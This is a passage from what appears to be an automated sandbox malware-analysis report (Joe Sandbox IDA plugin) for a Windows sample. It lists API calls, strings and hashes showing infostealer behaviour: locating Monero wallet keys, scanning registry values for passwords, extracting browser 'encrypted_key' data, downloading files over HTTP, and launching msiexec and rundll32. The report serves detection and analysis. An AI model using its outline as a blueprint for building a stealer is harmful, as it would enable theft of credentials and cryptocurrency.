                        • Opcode ID: ffeca6fc94dbc993803dead52b05abbe87c65f9c2de0ec925e45204560cddac8
                        • Instruction ID: e192249bb6e4a66666c73c8a29f6de6704a782b85ef005e554ea627a5e3509fa
                        • Opcode Fuzzy Hash: ffeca6fc94dbc993803dead52b05abbe87c65f9c2de0ec925e45204560cddac8
                        • Instruction Fuzzy Hash: 3471F9B5900208EFDB04DFE5DC89FEEB7B8BB48301F148519F619A7290DB34A949DB61
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C531C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C5335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C534EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: f8842a69d28a291be651e5407ef82bb4f0f7788f022e4b7c88cd0aae26f3e6e0
                        • Instruction ID: 90738c189fb0c27eb87104ae0bbeb5ec724e24f579d0d9c562eb9efa2ca01783
                        • Opcode Fuzzy Hash: f8842a69d28a291be651e5407ef82bb4f0f7788f022e4b7c88cd0aae26f3e6e0
                        • Instruction Fuzzy Hash: F0122F758101189ADB15EBA1DC92FDEB778BF14301F504269F90676091EF302B8EDFAA
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C46280: InternetOpenA.WININET(00C60DFE,00000001,00000000,00000000,00000000), ref: 00C462E1
                          • Part of subcall function 00C46280: StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46303
                          • Part of subcall function 00C46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C46335
                          • Part of subcall function 00C46280: HttpOpenRequestA.WININET(00000000,GET,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C46385
                          • Part of subcall function 00C46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C463BF
                          • Part of subcall function 00C46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C463D1
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55318
                        • lstrlen.KERNEL32(00000000), ref: 00C5532F
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00C55364
                        • lstrlen.KERNEL32(00000000), ref: 00C55383
                        • lstrlen.KERNEL32(00000000), ref: 00C553AE
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 8bb4595c6b587d1be2b91348b1657c52e6bf0b6b5ed4428e0b51b47813b08762
                        • Instruction ID: 32829629aa3dd6dc52c44a93b62bfa20ac424b0f557b8c282456077985492058
                        • Opcode Fuzzy Hash: 8bb4595c6b587d1be2b91348b1657c52e6bf0b6b5ed4428e0b51b47813b08762
                        • Instruction Fuzzy Hash: BC5120389101089BDB14FF62CD96AED7779BF10302F544128FC0A6A191EF346B8DEB66
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 18658e90dfb43333fe744fb3d5a6f2d86277bbe242b40658f9beab8b8090595b
                        • Instruction ID: 2d1031196e61eaa3f7d9a47e3dfad79a042de259e04f891db93c78f620395ca0
                        • Opcode Fuzzy Hash: 18658e90dfb43333fe744fb3d5a6f2d86277bbe242b40658f9beab8b8090595b
                        • Instruction Fuzzy Hash: A1C1C6B99001099BCB14EF61DC89FEA7378BB54301F044599F90A67181EB70AACDDFA5
                        APIs
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C542EC
                        • lstrcat.KERNEL32(?,008A03C0), ref: 00C5430B
                        • lstrcat.KERNEL32(?,?), ref: 00C5431F
                        • lstrcat.KERNEL32(?,0089F308), ref: 00C54333
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C58D90: GetFileAttributesA.KERNEL32(00000000,?,00C41B54,?,?,00C6564C,?,?,00C60E1F), ref: 00C58D9F
                          • Part of subcall function 00C49CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C49D39
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C593C0: GlobalAlloc.KERNEL32(00000000,00C543DD,00C543DD), ref: 00C593D3
                        • StrStrA.SHLWAPI(?,008A02A0), ref: 00C543F3
                        • GlobalFree.KERNEL32(?), ref: 00C54512
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49AEF
                          • Part of subcall function 00C49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C44EEE,00000000,?), ref: 00C49B01
                          • Part of subcall function 00C49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49B2A
                          • Part of subcall function 00C49AC0: LocalFree.KERNEL32(?,?,?,?,00C44EEE,00000000,?), ref: 00C49B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 00C544A3
                        • StrCmpCA.SHLWAPI(?,00C608D1), ref: 00C544C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C544D2
                        • lstrcat.KERNEL32(00000000,?), ref: 00C544E5
                        • lstrcat.KERNEL32(00000000,00C60FB8), ref: 00C544F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 456b459f0769c31f0009f0481f6907c5111081ea029890f766c195db85db9e77
                        • Instruction ID: f497c738e019533198269e3f29f37fe1f821f5f7ebb91e4d74b12dc3ec2e4e4d
                        • Opcode Fuzzy Hash: 456b459f0769c31f0009f0481f6907c5111081ea029890f766c195db85db9e77
                        • Instruction Fuzzy Hash: 0D717A76900218ABDB14EBA0DC89FEE7379BB48301F044599F609A7181EA34DB8DDF65
                        APIs
                          • Part of subcall function 00C412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C412B4
                          • Part of subcall function 00C412A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C412BB
                          • Part of subcall function 00C412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C412D7
                          • Part of subcall function 00C412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C412F5
                          • Part of subcall function 00C412A0: RegCloseKey.ADVAPI32(?), ref: 00C412FF
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4134F
                        • lstrlen.KERNEL32(?), ref: 00C4135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00C41377
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C41465
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 00C414EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 3d1d9ea3c0c50558c7e83ebfa2192bc73457ce3b053c5b49d1083c2f4d35d529
                        • Instruction ID: 5c7a932619649ac11790dc6df7c38845c2bd15d92dfa479f6204c0e51dfc0812
                        • Opcode Fuzzy Hash: 3d1d9ea3c0c50558c7e83ebfa2192bc73457ce3b053c5b49d1083c2f4d35d529
                        • Instruction Fuzzy Hash: 5B5154B5D501185BDB15EB61DC92BED733CAF54301F4042A8BA0A62081EE306BCDDFAA
                        APIs
                          • Part of subcall function 00C472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C4733A
                          • Part of subcall function 00C472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C473B1
                          • Part of subcall function 00C472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C4740D
                          • Part of subcall function 00C472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00C47452
                          • Part of subcall function 00C472D0: HeapFree.KERNEL32(00000000), ref: 00C47459
                        • lstrcat.KERNEL32(00000000,00C617FC), ref: 00C47606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C47648
                        • lstrcat.KERNEL32(00000000, : ), ref: 00C4765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C4768F
                        • lstrcat.KERNEL32(00000000,00C61804), ref: 00C476A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00C476D3
                        • lstrcat.KERNEL32(00000000,00C61808), ref: 00C476ED
                        • task.LIBCPMTD ref: 00C476FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: 8ceb89b22a456c9a589a498520454477da9214844eb962b4c0d4e3e1437be922
                        • Instruction ID: 1048d8626bc895c8001f8b8aa44e98b911afd33100e26d4b0af66f1b97439f7b
                        • Opcode Fuzzy Hash: 8ceb89b22a456c9a589a498520454477da9214844eb962b4c0d4e3e1437be922
                        • Instruction Fuzzy Hash: 633162B1900109DFDB08EBB5DC8ADFE7375FB44302B184129F506B7191EB34A94AEB61
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008A00D8,00000000,?,00C60E2C,00000000,?,00000000), ref: 00C58130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C58137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C58158
                        • __aulldiv.LIBCMT ref: 00C58172
                        • __aulldiv.LIBCMT ref: 00C58180
                        • wsprintfA.USER32 ref: 00C581AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: f8d362ce684e81e20e279c0a23ca530ea8f7c56e2fe1900d10d0efcf1123c082
                        • Instruction ID: 287d0aa0f5d020ba287b6ffb25fa060a5ae81912c689cc739fea2ccfb5baf56e
                        • Opcode Fuzzy Hash: f8d362ce684e81e20e279c0a23ca530ea8f7c56e2fe1900d10d0efcf1123c082
                        • Instruction Fuzzy Hash: 23213BB1E44208ABEB10DFD5CC49FAFB7B8FB44B01F104119F605BB280D77859498BA9
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                        • InternetOpenA.WININET(00C60DF7,00000001,00000000,00000000,00000000), ref: 00C4610F
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C4618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C461B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00C461DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C4620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00C46249
                        • InternetCloseHandle.WININET(?), ref: 00C46253
                        • InternetCloseHandle.WININET(00000000), ref: 00C46260
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 658d10da7c7c9f897bc9fa57b9c6f52d7bf9351403f1bfeab17ab330a9e6bfdc
                        • Instruction ID: 17fbc3c4e6daa1678b7d8f688bb1cfa630c2376f252c0b0af388daa77cc84a50
                        • Opcode Fuzzy Hash: 658d10da7c7c9f897bc9fa57b9c6f52d7bf9351403f1bfeab17ab330a9e6bfdc
                        • Instruction Fuzzy Hash: C35171B1900208AFEB20DF61DC45BEE7778FB04701F1081A9B609B71C4DBB56A89DF96
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C4733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C473B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C4740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C47452
                        • HeapFree.KERNEL32(00000000), ref: 00C47459
                        • task.LIBCPMTD ref: 00C47555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: ee6a3a6680672f1d57cd4a39d76985c5f0b0ea8886ca82d61dc703356372a540
                        • Instruction ID: c92715bf75b6cfaa8d0eaa6df06c493b3f4b1248a69f1d1cb02465b2a9a37287
                        • Opcode Fuzzy Hash: ee6a3a6680672f1d57cd4a39d76985c5f0b0ea8886ca82d61dc703356372a540
                        • Instruction Fuzzy Hash: 5A611CB59141689BDB24DB50CC45BEEB7B8BF44300F0482E9E649A6141DFB05FC9DFA1
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        • lstrlen.KERNEL32(00000000), ref: 00C4BC9F
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C4BCCD
                        • lstrlen.KERNEL32(00000000), ref: 00C4BDA5
                        • lstrlen.KERNEL32(00000000), ref: 00C4BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
